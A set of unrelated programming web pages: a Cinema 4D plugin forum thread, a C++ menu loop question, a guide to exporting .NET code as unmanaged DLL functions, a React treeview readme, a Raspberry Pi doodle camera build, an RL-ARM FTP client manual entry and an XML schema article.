And you want A1 and B1 to be hidden in addition to A and B? Are you using OBJECT_INPUT as a flag to register your plugin? But I think the flag only works for direct children; if you want to also hide grandchildren or any type of descendants, you will have to do that manually. You can do this with c4d.GeListNode.ChangeNBit() and the field c4d.NBIT_EHIDE. Maybe you could also just manually flag objects as BIT_CONTROLOBJECT, and by that mute their cache output, but that would be more of a hack and I would have to try myself if this would work (I doubt it will).

Cheers,
Ferdinand
+--MY_GENERATOR (has object link pointing to SOME_SOURCE)

The idea is to create functionality similar to what the Connect object has: an object link as a mesh source, and this source (the whole tree) has to be hidden. Touch is resetting the object cache, which is what I want to avoid, while GetAndCheckHierarchyClone is able to hide a whole subtree, keeping its cache.

@baca said in Touch input objects withot resetting its cache:

Touch is resetting object cache, what I want to avoid. While GetAndCheckHierarchyClone is able to hide whole subtree, keeping it's cache.

I would say the last sentence is not true. GetAndCheckHierarchyClone is just a wrapper around GetHierarchyClone, which, after a scenic tour through our backend, will call Touch in the case the argument dirty is True. In these cases, GetHierarchyClone will build the caches of objects, clone them, and immediately after that call Touch. Touch does three things: it sets the flag BIT_CONTROLOBJECT, it flushes the caches of the object, and it resets the dirty counter. So, in the case of the argument dirty being True, the cache is being built and directly after that flushed. Setting the flag BIT_CONTROLOBJECT plus the flushing of caches is IMHO what realizes an object being 'hidden'. No caches will prevent the object from being drawn, and BIT_CONTROLOBJECT will prevent the caches from being rebuilt automatically.

What happens in the case when dirty is False, i.e., the default case, is a bit harder to assess, as the code to cover then becomes much larger, and I do not have the time to cover it all. My assumption would be, however, that caches are also flushed, as this is the only way I can see this hiding to work.
The underlying problem here is that the classic API scene graph has no true dependency graph for its scene elements; the dirty system is what fulfils that function, but it does not tell you what is related to what. Which has led to the problem that things that might seem trivial are not, because everything has its little algorithm on top of algorithms to determine its dependencies.

Long story short: I would still recommend NBIT_EHIDE as a solution to your problem and also have provided an example for that at the end. The problem here is that while everything works fine and dandy while some object is an input object, it does not anymore when the user removes the object from that relation:

    SceneRoot
    +--Plugin
       +--A [hidden]
       |  +--B [hidden]
       +--C [hidden]

Plugin considers A, B, and C its input objects and has hidden them manually with NBIT_EHIDE; everything is working fine, yay! But wait, now the user moves B outside of the scope of what Plugin considers to be its inputs:

    SceneRoot
    +--Plugin
    |  +--A [hidden]
    |  +--C [hidden]
    +--B [hidden]

B is still hidden, but it should not be anymore. There is also no event being published inside of Plugin which would signal B being moved out of Plugin. I have solved this with a tag, but this is also a very hacky solution. I would assess if these requirements of yours are indeed irremovable requirements. If I were implementing this, I would simply cut features to avoid having to deal with this specific scenario.

The result: The example 'implements' a loft object which accepts a hierarchy of spline objects as inputs (the hierarchy is flattened depth first and fed into a normal loft object). The hiding and unhiding of the input objects is realized with NBIT_EHIDE and controller tags on each object (which are hidden themselves).

The code: import c4d UNHIDER_TAG_CODE = """ '''Implements a tag which unhides its host object when it is not (indirectly) parented anymore to an Oinputobject node.
It therefore realizes the counterpart to the hiding done in InputObjectData.GetInputs(). This is still a hack and I would not recommend doing it. If done more nicely, one should implement it as its own TagData plugin and spend more time on testing/assuring that an object cannot "glitch out" than I did here, as the result will be an unusable scene for the user. ''' import c4d Oinputobject = 1059626 def main() -> None: '''Unhides the object this tag is attached to if none of the ancestors of the object is an Oinputobject node. ''' def is_input_object(node: c4d.GeListNode) -> bool: '''Determines of any of the ancestors of #node is an Oinputobject node. ''' while node: if node.CheckType(Oinputobject): return True node = node.GetUp() return False # Get the object the tag is attached to and unhide the object when none of its ancestors is # a node of type Oinputobject. host = op.GetMain() if not is_input_object(host): host.ChangeNBit(c4d.NBIT_EHIDE, c4d.NBITCONTROL_CLEAR) """ class InputObjectData(c4d.plugins.ObjectData): """Implements a generator object which hides all its descendant nodes from the viewport. """ PLUGIN_ID = 1059626 @classmethod def GetInputs(cls, node: c4d.BaseObject, hh: any) -> tuple[c4d.BaseObject]: """Returns a list of clones of all descendants of #node and hides the original nodes. """ def iter_node(node: c4d.GeListNode) -> c4d.GeListNode: """Walks the sub-graph of a node depth-first. """ if node is None: return while node: yield node for descendant in iter_node(node.GetDown()): yield descendant node = node.GetNext() def callback(node: c4d.BaseObject) -> c4d.BaseObject: """Clones a node, hides the source node from the viewport, and attaches a tag which ensures that the object unhides itself once it is not an input object anymore. """ clone = node.GetClone(c4d.COPYFLAGS_NO_HIERARCHY) node.ChangeNBit(c4d.NBIT_EHIDE, c4d.NBITCONTROL_SET) # Exit when the node has already an "unhider" tag. 
tag = node.GetTag(c4d.Tpython) if isinstance(tag, c4d.BaseTag) and tag[c4d.TPYTHON_CODE] == UNHIDER_TAG_CODE: return clone # For more production ready code, I would recommend implementing the tag as a TagData # plugin. This would also make identifying an already existing "unhider" tag robust # via its plugin id. # Create the "unhider" tag, set the Python code and hide the tag from the users view. tag = node.MakeTag(c4d.Tpython) tag[c4d.TPYTHON_CODE] = UNHIDER_TAG_CODE tag.ChangeNBit(c4d.NBIT_OHIDE, c4d.NBITCONTROL_SET) return clone # Collapse all descendants of #node to a list of clones and hide each source node. return tuple(callback(n) for n in iter_node(node) if n is not node) def GetVirtualObjects(self, op, hh): """Implements a loft object which takes into account all its descendants for building the loft and not only the direct children. This is not fully fleshed out and serves only as an example for the case of hiding inputs. """ # Get and handle the input objects; or get out when there are not enough inputs. profiles = InputObjectData.GetInputs(op, hh) if len(profiles) < 2: return c4d.BaseList2D(c4d.Onull) # Create the loft object and parent the flattened inputs as direct children. loftNode = c4d.BaseList2D(c4d.Oloft) loftNode[c4d.CAPSANDBEVELS_CAP_ENABLE_START] = False loftNode[c4d.CAPSANDBEVELS_CAP_ENABLE_END] = False for item in profiles: item.InsertUnder(loftNode) return loftNode if __name__ == "__main__": c4d.plugins.RegisterObjectPlugin( id = InputObjectData.PLUGIN_ID, str = "Input Object Host", g = InputObjectData, description = "oinputobject", icon = None, info = c4d.OBJECT_GENERATOR) @ferdinand said in Touch input objects withot resetting its cache: NBIT_EHIDE Sorry Ferdinand, I might be not a great explainer... But that not I actually need. This bit only hides object in Editor, in Render it's still visible. So Touch() is the only way to truly hide the object. My only issue is that I'm trying to hide all nested objects with Touch(). 
And when I'm doing it I'm also touching the grandchildren, and this cause their parent to be rebuilt. I'm looking for a way to skip objects which already touched by their parent generator. To be clear, here's the use case: +--Null whole tree has to be hidden | +--Loft has BIT_CONTROLOBJECT, has OBJECT_INPUT — not hidden yet, has to be hidden | | +--Circle has BIT_CONTROLOBJECT — already hidden by parent Loft, has to be skipped | +--Loft has BIT_CONTROLOBJECT, has OBJECT_INPUT — not hidden yet, has to be hidden | | +--Cube has BIT_CONTROLOBJECT — not hidden by parent Loft, has to be hidden +--... +--MY_GENERATOR has object link pointing to Null, it wants to hide this Null whole tree has to be hidden has BIT_CONTROLOBJECT, has OBJECT_INPUT — not hidden yet, has to be hidden has BIT_CONTROLOBJECT — already hidden by parent Loft, has to be skipped has BIT_CONTROLOBJECT — not hidden by parent Loft, has to be hidden has object link pointing to Null, it wants to hide this Null If I'll try to Touch() Circle spline, then it's parent Loft would be continuously regenerating, so MY_GENERATOR would be also continuously regenerating, because source dirtiness is changed. If I'll try to skip Touch() children of objects with OBJECT_INPUT set, then Cube under Loft would be visible - because it wasn't touched by its parent Loft as Cube is not a spline object. So either I go into regeneration loop, either I'm not hiding objects. But I want both performance and hide. Hey @baca, as I said, the control object structure you want is not possible. I tried and wrote the necessary code when I answered here initially, and Cinema 4D will really start to freak out. You cannot have nested hierarchies of muted caches. If you really want to do this, then you must use the approach proposed by me. If you want to also hide the objects in renderings, then you will have to also set that parameter. 
If you poke around long enough, you might find a solution by muting the caches, but this is out of scope of support. As I said, I did already try when I wrote my first posting, maybe you have more luck. But as also stated in my first posting, you are poking here the sleeping bear called "classic API node dependencies".
https://plugincafe.maxon.net/topic/14048/touch-input-objects-withot-resetting-its-cache
Well. I'm having a little bit of an issue, and I take it that's just from my absolute lack of experience with C++ at the moment. But hey, let's give this a go. So, I'm constructing a little menu system, using a Do..While statement nested inside another one. (Mind you, I'm still on the first few lessons, but I'm still fiddling around with them. So I'll gladly take some advice on better methods, though I'm not sure if I'll understand it at this time.) So here's my code so far.

Code:
    #include <iostream>

    using namespace std;

    int main()
    {
        int input;
        int menu1;
        int menu2;
        int menu3;
        int menu4;
        int menu5;

        menu1 = 0;
        menu2 = 0;
        menu3 = 0;
        menu4 = 0;
        menu5 = 0;

        do {
            cout<<"Choose an Option.\n";
            cout<<"1. Option 1.\n";
            cout<<"2. Option 2.\n";
            cout<<"3. Option 3.\n";
            cout<<"4. Option 4.\n";
            cout<<"5. Option 5.\n";
            cout<<"0. Exit.\n";
            cout<<"Selection: ";
            cin>>input;
        } while (input != 0);

        switch ( input )
        {
        case 1:
            do {
                cout<<"1. Sub1 Option 1.\n";
                cout<<"2. Sub1 Option 2.\n";
                cout<<"3. Sub1 Option 3.";
                cout<<"4. Sub1 Option 4.";
                cout<<"5. Sub1 Option 5.";
                cout<<"9. Exit.";
                cin>> menu1;
            } while ( menu1 != 9 );
        }
    }

So, this code is quite incomplete. I'm still at the first stage of making it. Basically, it's supposed to work like this: you choose option 1, and it brings you to a submenu. Then, you can choose one of the sub-submenus. In the end, it'll be similar to a pyramid.

A quick explanation of the variables: input is the main input, for the first menu. Then menu1 controls the first submenu. So from the code I have, in essence, at the end, I could put } while ( menu != 9 && input != 0 ) and I (believe) it would still work out. It's just running both subs. But when I run this code, it doesn't move on from one menu to another. (Though I've only done the first sub-menu.) So when I push 1, it should move to the first case, but it doesn't. What have I got wrong here?
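The snag, hedging that this is my reading of the code rather than something stated in the thread, is that the first do..while keeps looping until input == 0, so by the time the switch runs, input can only ever be 0 and case 1 is unreachable. Moving the switch inside the loop fixes it. A compilable sketch, with the menu I/O parameterized on streams so the logic can be exercised without a keyboard:

```cpp
#include <iostream>
#include <sstream>

// Sketch of the fix: dispatch on the selection *inside* the outer loop instead
// of after it. Stream parameters are used so the logic is testable; in the
// real program you would pass std::cin and std::cout.
void runMenu(std::istream& in, std::ostream& out)
{
    int input = 0;
    do {
        out << "Choose an Option (0 to exit): ";
        if (!(in >> input))
            return;                      // bail out on bad or exhausted input
        switch (input) {                 // runs every iteration, not after the loop
        case 1: {
            int menu1 = 0;
            do {
                out << "Sub1 menu (9 to exit): ";
                if (!(in >> menu1))
                    return;
            } while (menu1 != 9);
            break;
        }
        default:
            break;
        }
    } while (input != 0);
}
```

In the real program, main would simply call `runMenu(std::cin, std::cout);` and each selection would reach its case before the outer loop checks for 0 again.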
http://cboard.cprogramming.com/cplusplus-programming/121180-do-while-switch-printable-thread.html
Exporting Managed Code as Unmanaged

I. Introduction

The following article explains in detail how to use any .NET assembly from BlitzPlus/Blitz3D. The exported code presented here can actually be used with any other unmanaged code which supports loading of DLL's, but I chose Blitz3D as a reference here, because I needed this support for Blitz at the time of writing. This article focuses on how to use a DLL created with the Microsoft .NET Framework with Blitz. I have written this article since I personally believe the .NET Framework is the best thing that ever happened to the programming part of the world, and I found it unbearable that Blitz could not utilize the potential power it offers in terms of both game and application development. In this article I am going to assume a few things about you:

- You know what the .NET Framework is and how it works.
- You know how to use at least 1 .NET enabled programming language like C# (C-sharp), VB.NET, Managed C++, IL, etc.
- You know about IL Code, the IL Assembler and Disassembler. You do not have to be a guru; just some knowledge about its existence will do, and I will try to explain as much about it as possible. This is actually an important part, since the actual code exporting is done using IL Code.
- You know how Blitz userlibs work.

If any of these items are not met, I suggest you try and learn about those before you continue with this article. I will try to explain all the steps involved as well as I can, so a complete newbie should be able to use it too, but lack of knowledge about some of these items might get you into trouble at some stage.

II. Requirements

Creating your Blitz DLL's with .NET is not hard, but it will require you to pay attention to some details about the gory CLR internal workings. If you got all this sorted, we're ready to rock!

III. Getting Started

Now we need a simple dll, created using the .NET framework and any language it supports. From here on I will be using C#, since I consider it the best language ever to be created, but the sample should not be too hard to convert to your own liking. Below is the code for my simple dll.

// HelloWorldDll.cs
using System;

namespace HelloWorldDll
{
    public class HelloWorldClass
    {
        public static string SayHello(string name)
        {
            return ("Hello " + name);
        }
    }
}

Up until now, this should appear pretty straightforward to any of you. I didn't do anything special: just create a namespace HelloWorldDll, create a class called HelloWorldClass, and give it 1 method called SayHello(string name). Now, all our function does is take a string value as a parameter, combine it with the string "Hello " and return the resulting string. Note that I have made the class PUBLIC. This is NOT required! It does not matter how you define your class for the final result to work; it's just cos I felt like doing it this way. The same goes for the function declaration. Your function does not have to be public or static for that matter. Just use whatever suits your needs. The reason I used a parameter and a return value is because I want to show you that passing values in and out works. You can even pass a Blitz Type instance to a function, provided your .NET assembly declares a struct which has exactly the same fields as the Type. Example:

// C#
public struct SomeStruct
{
    public int X, Y, Z;
    public string Name;
    public object Obj;
}

;// Blitz
Type SomeType
    Field X, Y, Z
    Field Name$
    Field Obj
End Type

The above will work if you pass an instance of your SomeType Type to the function as a parameter. The only limitation is the fact that you cannot have the .NET function use such a struct as a return value; that is the BAD case. Just pass the instance as a parameter and have it filled like that. Compile the code, and you will find HelloWorldDll.dll in your working directory.

IV. The Real Business

Now it's time to get down n dirty.
We need to create a Dll which normally runs in a managed environment, and have it work with completely unmanaged code. How, o, how do we fix this?? First of all, exporting managed code for use in unmanaged assemblies/code is normally possible through a technology called COM interop. This basically means that you create a COM interface for your DLL and have the unmanaged code use this to reach your managed code. We will take a different route here, working directly with IL Code, the assembly version of the .NET Framework. It behaves like Java Bytecode, or at least, it performs the same task, in that IL Code is the final step that ALL .NET languages like C#, VB.NET, C++ etc get to before being compiled to native machine code (by the JIT compiler). Meaning that all these languages ultimately compile to Pure IL Code. It is this IL Code which makes sure that all the previously named languages can be used with each other, and which (theoretically) makes any .NET assembly platform independent. This IL Code is compiled into the resulting Exe or Dll, together with an extensive description of its actual contents, called MetaData. What we are interested in is the IL Code itself. As I just explained, this is stored in the final Exe/Dll, so we need a way to extract it. The answer to this is the nifty little IL Disassembler; whether the ease with which it dumps any assembly back to IL source is a bug or a feature is debatable. Personally I think it's great for learning purposes and situations such as the one we face in this article, where a regular language just won't cut it, and we need that extra edge IL code offers. To business. We will now decompile our dll into IL code, so we can edit it around a bit and then rebuild it with the IL Assembler. The disassembly also produces a resource file; that matters if your dll contains forms and controls and such, but in our case it's just a file waiting to be deleted. The file of interest is, of course, HelloWorldDll.il. Open it in a text editor and be amazed at the mess you see. Please don't get put off by the garbled presentation of the code, since it's really not that bad. First of all, you may want to clean it up a bit by removing all the residual blank lines and unsightly comments (starting with '// ..'). Note that this is NOT needed!
This code will compile into a dll perfectly; it's just to make life easier on you when you edit the code. Below is what our IL Code should look like after cleaning it up. All I am leaving in there is the relevant parts, eg: the parts we need for our final DLL.

.assembly extern mscorlib {}
.assembly HelloWorldDll {}
.corflags 0x00000001

.namespace HelloWorldDll
{
  .class public auto ansi HelloWorldClass
  {
    .method public static string SayHello(string name) cil managed
    {
      .maxstack 2
      ldstr "Hello "
      ldarg.0
      call string [mscorlib]System.String::Concat(string, string)
      ret
    }
  }
}

Now isn't that beautiful? :D As you can see, IL looks like a genuine programming language! :) In effect, it is a genuine programming language, because you can actually write your programs straight in IL if you want. It's a pretty straightforward language. Easy to understand as well. Not anything at all like MASM32 or TASM or any of that stuff. IL Code is a Stack Based Assembly language. The big difference with languages like MASM32 and TASM is that IL does NOT use registers; all is done through the Stack and Heap. But that's all gory details which you probably won't need to worry about. Serge Lidin's book on the IL assembler explains a lot of the really gory details about the inner workings of IL code, the CLR, and also why it works the way it does. VERY interesting read! Btw, if you ever need to ask Mr. Lidin some questions about IL, I happen to know he frequently visits the IL Code Forum. Anyways… we want to export our code for use in blitz. So let's get to it. First we will change the line that says:

.corflags 0x00000001

into:

.corflags 0x00000002

Why? Well, this flag is part of the Common Language Runtime header, which tells Windows that it's dealing with a genuine .NET assembly and not a regular windows executable. This value is, by default, always set to COMIMAGE_FLAGS_ILONLY (0x00000001). This means that the assembly contains only Pure IL Code, so no embedded native/unmanaged code is present in the Exe or Dll. COMIMAGE_FLAGS_ILONLY (0x00000001): the image contains IL Code only, with no embedded native unmanaged code except the startup stub.
Because Common Language Runtime - aware operating systems (such as Windows XP) ignore the startup stub, for all practical purposes the file can be considered Pure-IL. However, using this flag can cause certain ILAsm compiler-specific problems when running under Windows XP. If this flag is set, WinXP ignores not only the startup stub but also the .reloc section. That is why we switch the flag to COMIMAGE_FLAGS_32BITSREQUIRED (0x00000002). COMIMAGE_FLAGS_32BITSREQUIRED (0x00000002): the image file can be loaded only into a 32-bit process. This flag is set when native unmanaged code is embedded in the PE file or when the .reloc section is not empty. Next up: reserving some space in our final Dll to store the address of our function. This will be filled at runtime with the actual address of the function; we just need to reserve the space. In order to expose managed methods as unmanaged exports, the ILAsm compiler builds a v-table, a v-table fixup (VTableFixup) table, and a group of unmanaged export tables, which include the Export Address Table, the Name Pointer Table, the Ordinal Table, the Export Name Table and the Export Directory Table. The VTableFixup table is an array of VTableFixup descriptors, with each descriptor carrying the RVA of a v-table entry, the number of slots in the entry, and the binary flags indicating the size of each slot (32 or 64 bit) and any special features of the entry. Each slot of a v-table in a managed PE file carries the token of the method the slot represents. At runtime the v-table fixups are executed, replacing the method tokens with actual method addresses. The ILAsm syntax for a v-table fixup is:

.vtfixup [<num_slots>] <flags> at <data_label>

Note that the square brackets in [<num_slots>] are part of the statement, and do not mean that <num_slots> is optional! <num_slots> is an integer constant indicating the number of v-table slots grouped into one entry because their flags are identical. This serves no other purpose except to save space in your code file.
You can use a separate .vtfixup statement for each method if you like; each statement adds one of the VTableFixup descriptors in the VTableFixup table. The v-table entries are defined simply as data entries. Note that the v-table must be contiguous. In other words, the data definitions for the vtable entries must immediately follow one another. The method tokens are put into the designated v-table slots by the ILAsm compiler. To achieve that, it is necessary to indicate which entry and slot a method occupies, as in the following code:

…
.vtfixup [1] int32 fromunmanaged at VT_01
.data VT_01 = int32(0)  // always use 0, the slot will be filled
                        // automatically at runtime

.method public static void Foo()
{
  .vtentry 1 : 1  // entry 1, slot 1
}

The ILAsm syntax for actually declaring a method as exported code is quite simple:

.export [<ordinal>] as <export_name>

Where <ordinal> is an integer constant. The <export_name> provides an alias for the exported method. Applied to our IL file, the changed parts look like this:

// ### CHANGE #### -> Change Image CoreFlag to
// COMIMAGE_FLAGS_32BITSREQUIRED to fix the potential WinXP pitfall
.corflags 0x00000002

.vtfixup [1] int32 fromunmanaged at VT_01
.data VT_01 = int32(0)

    .method public static string SayHello(string name) cil managed
    {
      // ### CHANGE #### -> Specify which VTable entry to use
      // for this function
      .vtentry 1 : 1
      // ### CHANGE #### -> Export the method as unmanaged code with
      // the alias "SayHello"
      .export [1] as SayHello
      // (rest of the method body unchanged)
    }
  }
}

There ya go! We're done! :) After all the theoretical mumbo-jumbo it seemed a daunting task, but as you see, it requires that you add just a few lines of code and you're set. Really no big deal. Time to re-compile our dll and use it in blitz!

V. Finalize

Save! To test it, copy the Dll into the Blitz3D\Userlibs\ directory and create a new textfile called Hell

Regards, Jim Teeuwen.
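For reference, a Blitz3D userlib declarations (.decls) file for this dll would conventionally look something like the following sketch (assumed from the standard userlib format, not recovered from this article):

```
.lib "HelloWorldDll.dll"
SayHello$(name$):"SayHello"
```

With that in place, Blitz code such as Print SayHello("World") should print "Hello World".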
http://www.csharphelp.com/2007/03/exporting-managed-code-as-unmanaged/
React FileSystem Treeview (react-fs-treeview)

Specify a path of a directory on your machine and this component will render a treeview of the path including its child files/folders. This component uses lazy loading of the children, hence making it blazing fast.

Features

- Deep nesting of folders till nth level.
- Lazy loading of child nodes.
- Bookmark a file.
- Rename a node.
- Delete a node.
- Drag/Drop a node to another folder.
- Resizable frame.

Screenshot

Youtube Screencast

Install

npm i react-fs-treeview

Import the component.

import Tree from "react-fs-treeview";

Usage

<Tree
  className="class1 class2 class3"
  basePath="/var/www/html"
  disableContextMenu={false}
  onItemSelected={selectedItem => console.log(selectedItem)}
/>

Note: For actions like listing of trees, Rename, Delete, and moving items, it is required to run the treeview server. The server code can be found at ./dist/server/server.js. In case you wish to run the server on a non-default host or port, set an env variable fsTreeViewUrl and set its value to the server url.

Props

basePath : (string) Path of the folder.
className : (object) CSS class(es) that you would like to apply to the treeview.
disableContextMenu : (boolean) If true, disables the context-menu options (Rename, Delete and Bookmark) shown when right-clicking a file/directory. Defaults to false.
onItemSelected : (callback) Function called when a file/folder is clicked.
https://www.npmjs.com/package/react-fs-treeview
The previous post walked through the first several parts of this project, namely the voice activation and object detection. This time, we will wrap up the remaining software and hardware components to build a complete object detection doodling camera. After the previous object detection step, the bounding box, class, and score for each detection will be available. The size and center location of an object can be further obtained from the bounding box values. The trick to creating almost non-repetitive, high-resolution drawings is to use the Google quick draw datasets, where each drawing is recorded as stroke coordinates on a canvas. Take a look at the 103,031 cat drawings made by real people on the internet here. The following code snippet shows you how you can turn the strokes of the first "cat" drawing, fetched with dataset.get_drawing(), into an image.

import gizeh as gz
from matplotlib import pyplot as plt
from PIL import Image
%matplotlib inline
from drawing_dataset import DrawingDataset

dataset = DrawingDataset('./data/quick_draw_pickles/', './data/label_mapping.jsonl')
dataset.setup()
strokes = dataset.get_drawing('cat', 0)

lines_list = []
for stroke in strokes:
    x, y = stroke
    points = list(zip(x, y))
    line = gz.polyline(points=points, stroke=[0, 0, 0], stroke_width=6)
    lines_list.append(line)

lines = gz.Group(lines_list)
surface = gz.Surface(width=300, height=300, bg_color=(1, 1, 1))
lines.draw(surface)
plt.imshow(surface.get_npimage())

For example, the second stroke for this cat has 3 points drawn from right to left. Since the SSD

Thermal printers are also known as receipt printers. They're what you get when you go to the ATM or grocery store. They work by heating up dots on thermal paper which is coated with a material formulated to change color when exposed to heat, so there is no need for ink.
This printer is ideal for small embedded systems such as the Raspberry Pi and even microcontrollers, since it communicates with the application processor over a TTL serial port and is powered by 5-9 VDC @ 1.5 A while printing. As long as your system has a spare serial port, no additional printer driver is necessary, which means you can use the Python printer library across OSes, whether on an Ubuntu PC, a Windows PC, or a Raspberry Pi. My Python printer library has several improvements over the original Adafruit library in both speed and stability when printing large bitmap images. An image is first converted to a binary bitmap, then printed row by row. The "denser" a row is, the more heating time the printer requires; otherwise blank lines can appear. Dynamically calculating the printing time for each line achieves optimal speed and stability. Take this 8 x 8 binary bitmap as an example: row 1 has 4 dots to print and row 5 has only 2, so row 1 requires a little more time than row 5. Since the maximum width that can be printed on the thermal paper is 384 pixels, we first rotate the drawing image by 90 degrees to print it vertically, line by line. It is also necessary to raise the baud rate to 115200 from the default 19200 or 9600 to achieve faster bitmap printing, since sending a complete 384 by 512 bitmap through a serial port takes a lot of bandwidth. I have attached a tool for this on my GitHub. Voice activation without any response or feedback can ruin the user experience; that is why we add a single LED that blinks in different patterns to show whether a voice command was detected. An additional push button provides an extra option to trigger the camera capture, object detection, drawing, and printing workflow. The gpiozero Python library that comes with the Raspberry Pi system provides a quick solution for interfacing with its IO pins.
It allows you to pulse or blink LEDs in a variety of fashions and handles the timing in a background thread without further interaction. A push button can trigger a function call in just two lines:

button = Button(button_pin)
button.when_pressed = callback_function

All the GPIO usage is defined in the ./raspberry_io/raspberryio.py file in case you want to change how the LED blinks and pulses. While it is possible to obtain a powerful 5V power bank supplying current at 3 A, it might be too chunky to fit inside our camera box. Using a compact two-cell 7.4 V lipo battery to power the Raspberry Pi and the thermal printer at the same time seems like a viable way to go. You can power the thermal printer directly from the 7.4 V battery while the Raspberry Pi takes a 5V supply; that is where the DC-DC buck module comes into play. It is a switching power supply that steps down the voltage from its input to its output. I am using an LM2596 DC to DC buck converter as you can see on Amazon. There is a little potentiometer on the module to adjust the output voltage. With the battery connected to its input power and ground pins, turn the little knob on the potentiometer while monitoring the output voltage with a multimeter until it reaches 5V. Here is the final complete diagram showing how the parts are connected. Feel free to leave a comment if you have a question about building your object detection and doodling camera.
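As a footnote to the printer section above: the dynamic per-row timing idea can be sketched in plain Python (the constants and function names are invented for illustration; the real library tunes its delays to the printer's heating elements):

```python
BASE_DELAY_US = 600   # assumed time needed even for an empty row
PER_DOT_US = 30       # assumed extra heating time per dark dot

def row_delay_us(row):
    """Scale the heating delay with the number of dark dots in a bitmap row."""
    dots = sum(1 for px in row if px)   # px is 1 for a printed (dark) dot
    return BASE_DELAY_US + PER_DOT_US * dots

def delays_for_bitmap(bitmap):
    """Compute the per-row delays for a whole binary bitmap."""
    return [row_delay_us(row) for row in bitmap]
```

A dense row therefore waits longer than a sparse one, which is exactly why row 1 of the 8 x 8 example prints more slowly than row 5.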
https://www.dlology.com/blog/diy-object-detection-doodle-camera-with-raspberry-pi-part-2/
Technical Support On-Line Manuals RL-ARM User's Guide (MDK v4)

#include <net_config.h>

void *ftpc_fopen (
  U8* mode );    /* Pointer to mode of operation. */

The ftpc_fopen function opens a local file for reading or writing. The argument mode defines the type of access permitted for the file. It can have one of the following values:

"r" - opens the local file for reading.
"w" - opens the local file for writing.

The ftpc_fopen function is in the FTPC_uif.c module. The prototype is defined in net_config.h.

Note
The ftpc_fopen function returns a pointer to the opened file. The function returns NULL if it cannot open the file.

See also: ftpc_fclose, ftpc_fread, ftpc_fwrite

#define LOCAL_FILE "Test.bin"

void *ftpc_fopen (U8 *mode) {
  /* Open local file for reading or writing. If the return value is NULL, */
  /* processing of FTP Client commands PUT, APPEND or GET is cancelled.   */
  return (fopen (LOCAL_FILE, mode));
}
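A defensive variant of the interface function is easy to sketch with only the standard C library (the function name and the mode check below are illustrative, not part of the RL-ARM sources):

```c
#include <stdio.h>
#include <stddef.h>

#define LOCAL_FILE "Test.bin"

/* Hypothetical defensive variant: returning NULL cancels the
   FTP client command (PUT, APPEND or GET) that triggered the open. */
void *ftpc_fopen_checked (const char *mode) {
    if (mode == NULL || (mode[0] != 'r' && mode[0] != 'w')) {
        return NULL;   /* unknown mode: cancel the command */
    }
    return fopen (LOCAL_FILE, mode);
}
```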
https://www.keil.com/support/man/docs/rlarm/rlarm_ftpc_fopen.htm
It’s late in the afternoon (or the wee hours of the morning, depending on your coding preference) and you want to stop for the day. But you can’t. The XML application you’re writing has developed a mysterious bug. All the regression tests pass, but when you run the application and have it try to process your boss’s XML document, the whole thing crashes. You’ve read the code a dozen times; you know it works. What’s wrong? The odds are good that your boss’s document contains invalid XML data, or is using XML elements and/or attributes in a way that you never anticipated. If you were using an XML schema when reading in the source document, you would have found this bug hours ago. Instead of crashing, your application would have notified you that it was given invalid XML data. In past articles we’ve examined the fundamentals of XML and taken an introductory look at programming with it. In this article, we’ll turn our attention to XML Schema languages, which are used to define an XML schema for an application to use. There are several alternative schema languages competing for mind share at the moment. In this article, we’ll examine the four most common languages and look briefly at their features. We’ll also look at how you can use them in your applications today.

What Is a Schema?

A schema is nothing more than a set of constraints. These constraints can apply to both the content and attributes of an XML element (comments and processing instructions are ignored and inaccessible to most schema languages). Note that sometimes the term “schema” is used to mean an abstract set of constraints and sometimes it is used to mean a particular document that contains a schema in some specific language. This distinction is not often important, but it can lead to some confusion if you’re considering several alternative schema languages. Throughout this article, we’ll examine four schema languages: XML 1.0 DTDs, W3C XML Schema, RELAX NG, and Schematron.
There are other languages, but these four are by far the most common. The most important benefit of a schema is that it allows you to test the validity of an XML document. An XML document is said to be valid with respect to a particular schema if it violates none of the constraints of that schema. What Is Validation? Validation is the process that answers the question: Does this particular document conform to this specific schema? The principal result of validation is an answer, either “yes” or “no.” As we’ll see later on, validation may also provide useful side-effects for an application. The specific tool for, or means of, performing validation on a document varies depending on the schema language that you are using. You should validate your XML documents because this will prevent errors and simplify subsequent processing. XML is structured data. Whenever you write an application or stylesheet that processes an XML document, it’s almost always going to be designed to handle only a certain class of documents. For example, if you write an application that is designed to print mailing labels from XML addresses, it probably isn’t going to do anything useful if you hand it an SVG (Scalable Vector Graphic) diagram or the text of Shakespeare’s Romeo and Juliet. If you were reading the addresses from an unstructured or binary format, you’d have to build error-checking into your application. But with XML, you can use validation to greatly simplify your task. By passing the input document through a validator, you can determine beforehand if it’s going to have the structure you expect (and reject it outright if it doesn’t). By the same token, you can write your applications to accept all of the possible valid structures because they are identified by the schema. 
As soon as you start working with XML vocabularies that are a little bit unfamiliar, or vocabularies that have more elements than you can remember off the top of your head, you’re bound to run into some trouble if you don’t validate. Even for small documents, there’s no substitute for validation. It can be extremely frustrating to stare at a document a dozen times or more before realizing that you’ve used <lastname> instead of <surname> and that you’d not turned on validation. Validation would have revealed the error in seconds.

What Can You Validate?

Validation can check two different kinds of constraints — constraints on simple types and those on complex types. The specific nature of the constraints that a given schema language can express is the principal feature that distinguishes the languages from one another.

Simple Types: Simple types are atomic strings that occur in a document. They are often attribute values, but some schema languages allow you to define element content in terms of simple types. Strings, numbers, positive integers, and dates are all examples of simple types. In order for a string to satisfy the constraints of a simple type, it must first be a simple string of characters (meaning that it can’t contain any elements). Secondly, it must be in the “lexical space” of the type that it is being tested against. This is just a fancy way of saying that it must “look like” a value of the right type. So, this means that an integer must contain only decimal digits, possibly with a leading sign character; if it’s a date, it must look like an ISO 8601 date, and so on.

Complex Types: Complex types can be a little harder to understand. A complex type is an arrangement of elements, attributes, and possibly text. Complex types represent things like postal addresses, chapters of a book, and purchase orders (anything with sub-element structure).
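The "lexical space" idea is easy to demonstrate with a toy checker (the class and patterns below are invented for illustration and are much looser than any real schema language's rules):

```java
import java.util.regex.Pattern;

public class LexicalSpace {
    // Toy checks: does a string "look like" a value of the given type?
    static final Pattern INTEGER = Pattern.compile("[+-]?[0-9]+");
    static final Pattern DATE    = Pattern.compile("[0-9]{4}-[0-9]{2}-[0-9]{2}");

    public static boolean looksLikeInteger(String s) {
        return INTEGER.matcher(s).matches();
    }

    // An ISO 8601 calendar date such as 2002-03-01
    public static boolean looksLikeDate(String s) {
        return DATE.matcher(s).matches();
    }
}
```

A validator performs exactly this kind of test (with far more care) before it will accept "42" as an integer or reject "March 1, 2002" as a date.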
Types of Constraints

